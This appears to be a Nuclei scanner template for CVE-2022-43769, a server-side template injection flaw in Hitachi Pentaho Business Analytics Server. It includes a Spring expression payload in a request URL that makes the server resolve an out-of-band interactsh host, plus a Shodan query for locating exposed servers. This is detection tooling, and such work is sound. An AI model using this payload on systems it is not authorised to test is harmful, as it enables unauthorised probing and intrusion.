53 lines
2.4 KiB
YAML
53 lines
2.4 KiB
YAML
id: CVE-2022-43769
|
|
|
|
info:
|
|
name: Hitachi Pentaho Business Analytics Server - Remote Code Execution
|
|
author: dwbzn
|
|
severity: high
|
|
description: |
|
|
Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.
|
|
remediation: Upgrade to 9.4 with Service Pack 9.4.0.1. For version 9.3, recommend updating to Service Pack 9.3.0.2.
|
|
reference:
|
|
- https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769-
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-43769
|
|
- http://packetstormsecurity.com/files/172296/Pentaho-Business-Server-Authentication-Bypass-SSTI-Code-Execution.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2022-43769
|
|
cwe-id: CWE-74,CWE-94
|
|
epss-score: 0.27382
|
|
epss-percentile: 0.96312
|
|
cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: hitachi
|
|
product: vantara_pentaho_business_analytics_server
|
|
shodan-query: http.favicon.hash:1749354953
|
|
tags: packetstorm,cve,cve2022,rce,ssti,pentaho,kev
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
words:
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "false"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
# digest: 4a0a00473045022100d8a4b742f554404042c77e39bd1ee9a2fa2af48453a27251b7015603a4e9703f022010cae0191a874bb4b38fed9175d2f91f84dc356905e8d30ac60738bb21f1c91c:922c64590222798bb761d5b6d8e72950
|